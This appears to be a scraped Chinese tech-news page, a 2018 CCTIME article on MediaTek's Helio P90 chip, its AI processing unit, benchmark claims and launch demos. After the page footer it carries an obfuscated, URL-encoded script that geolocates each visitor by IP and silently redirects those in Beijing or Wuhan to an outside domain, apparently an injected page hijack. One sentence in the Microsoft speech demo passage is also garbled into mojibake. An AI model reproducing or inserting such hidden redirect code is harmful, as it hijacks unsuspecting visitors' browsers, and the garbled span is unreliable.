首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 必读固定一 >> 正文

当手机沦为PC,联发科想挖掘新的换机动力

2018年12月18日 08:13  CCTIME飞象网  作 者:魏德龄

飞象网讯(魏德龄/文)全球手机出货量下滑,iPhone不再公布销量,消费者面对手机仿佛失去了热情,“两年前的手机现在依旧用着好好的。”这是很多用户的现实体会。当手机逐渐沦它所取代的PC,性能过剩的创新陷阱下,什么样的颠覆式体验才能撬动新一轮的购买力呢?

 

“比快更快”,让你没了换机动力

“性能提升X倍,采用全新Xnm工艺“,这样的SoC产品宣传词,你是不是听起来耳朵都磨膙子了?然而,近年来手机行业正在变得越来越像PC行业,性能的不断提升,并没有让用户体验发生质的变化,对于不追求在“吃鸡”、“农药”这类游戏统御世界的大量普通用户而言,1-2年前的手机,拿在手里的使用体验并没有缩水太多,移动支付、线上通讯、社交网络,每个功能上的体验都能流畅保证。所以,用户出现换机动力不足的情况也就不足为奇了。

根据2018年11月的数据显示,目前国内手机市场总体出货量及上市新机型数量均呈下降趋势,从1月到11月的总出货量仅为3.79亿部,同比下降15.6%。与之相对应的是,全球市场的换机周期变是21个月,而中国手机用户的换机周期也从18个月增长到22个月。

而当分析到造成用户换机动力不足的原因时,外界普遍认为缺乏颠覆式创新,功能严重同质化,是造成市场销量持续下降的主要因素。手机性能上的“比快更快”,在如今性能过剩的时代,已经难以诱惑消费者的钱包。

 

用3-5倍的成本打造最强AI

“目前,大部分消费者并不关注一辆汽车的百米加速度是4s还是3.95s,所以我们认为让消费者得到好的体验是更加重要的。”联发科技总经理陈冠州这样表述了该公司对于目前手机消费者需求的看法。于此同时,在当下7nm芯片横行的时代,联发科却带来一款定位为“新高端”的12nm产品Helio P90,并表示其投入的研发成本是之前产品的3-5倍。

那么这款定位“新高端”,准备挑战传统高端规格的产品,又高在哪里了呢?实际上,早在产品发布之初,Helio P90的AI跑分就已经在在苏黎世联邦理工学院发布的AI性能榜上傲视群雄,Helio P90位列首位高达25645分,高于22082分的骁龙855,21526分的麒麟980,位列世界第一。要知道排在它身后的两款明年的旗舰级SoC都采用了7nm的工艺,却大幅输给了12nm的Helio P90。

AI识别速度明显领先竞争对手的Helio P90

“这和打造芯片的理念有关,要用对的方式,好的架构做出来。”联发科这样讲述本次设计Helio P90的思路,他们还表示要让科技与体验并行不悖,只有两者都做到最好,才能打造出好的产品。Helio P90中采用的APU 2.0采用联发科技的融合AI(fusion Al)先进架构,相较于CPU、GPU和DSP,APU2.0可以实现50倍的性能提升和95%的功耗降低,算力最高能够达到1127 GMACs(2.25 TOPs),支持Int8和FP16,功耗比上一代APU 1.0降低了50%,带宽需求也降低了50%,相较于Helio P70和HelioP60,不仅能够带来全新的AI体验,算力也提高了4倍。这也让12nm的Helio P90成为了目前最聪明的SoC。

显然,这样的产品思路,与竞争对手相比,有着明显的不同。而在上周,联发科在深圳举行举行的Helio P90发布会也是一场与众不同的SoC发布会,整场发布会一半的时间讲芯片,另一半的时间则邀请了谷歌、微软、腾讯等AI合作伙伴讲AI的创新发展与体验。联发科认为,对于AI体验来说,硬件和软件同样重要,产业通力合作才能让用户体验达到最佳。

联发科还对外提供了名为NeuroPilot 2.0的一个更加完整开放的边缘AI平台,完整支持Android NNAPI,可依需求调用APU/GPU/CPU,对第三方App开发者更加友好,可有效提高APU利用率。同时提供完善的NeuroPilot Toolkit开发工具。

 

APU将成颠覆体验关键核心

联发科的Helio P90发布会现场还专门设置了AI体验区,其中展示多项AI应用,在与竞争对手在AI性能PK的同时,也展示出了联发科目前联合业界,通过AI,为手机带来颠覆性体验的努力。陈冠州在开场演讲时表示,APU将成为颠覆体验的关键核心,手机的摄像头将因为APU性能的提升,而成为手机的双眼。

电影《铁甲钢拳》

联发科技无线通讯事业部产品规划暨营销资深总监李彦辑博士甚至表示,通过APU,就能实现实时的3D姿态识别,电影《铁甲钢拳》中的情景即将到来。说起电影《铁甲钢拳》,主要以未来的拳击运动已经被高科技的机器人互博取代为背景。人类无法亲自上场比赛,取而代之的是他们操纵机器人在赛场上厮杀。

而在联发科的Helio P90发布会的现场体验区,恰恰展示了这样的黑科技,通过搭载了Helio P90的原型机中的摄像头,对于目标人进行动作捕捉,相应的动作便能实时在他旁边的多台机器人上呈现,就好像人在给机器人领舞。

AI实时虚拟化身

微软语音翻译

此外,利用Helio P90还能实现AI实时虚拟化身,能通过手机摄像头来实时将用户的形象转化为3D的二次元形象。利用与微软合作的语音翻译,还能在翻译用户语音的同时,为用户虚拟出3D动漫头像。发布会现。⑷硌侵扪芯吭焊痹撼づ颂煊踊瓜虼蠹艺故玖宋⑷碜钚碌挠镆裟D饧际,利用AI技术,甚至能模拟出说话者的断句习惯及说话过程中的呼吸感,完全做到了以假乱真的效果。

通过现场演示可以发现,Helio P90的优势在于,可以将手机彻底变为边缘AI,相比于尽管采用7nm工艺,但需要云端AI来实现功能的芯片来说,可以更快实现智能识别功能。例如上面的演示中,随着模特变换服装,Helio P90可以识别出每一件衣服的信息,而采用云端AI技术的芯片在识别的速度和技术上都有很大差距。

显然,联发科通过Helio P90让摄像头成为了手机的双眼,并衍生出了大量的AI应用,带来了全新的颠覆式体验。据悉,搭载Helio P90的终端将于2019年第一季度在全球上市。届时,有了双眼的手机,将准备彻底改变性能过剩时代下的同质化体验。

编 辑:值班记者
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E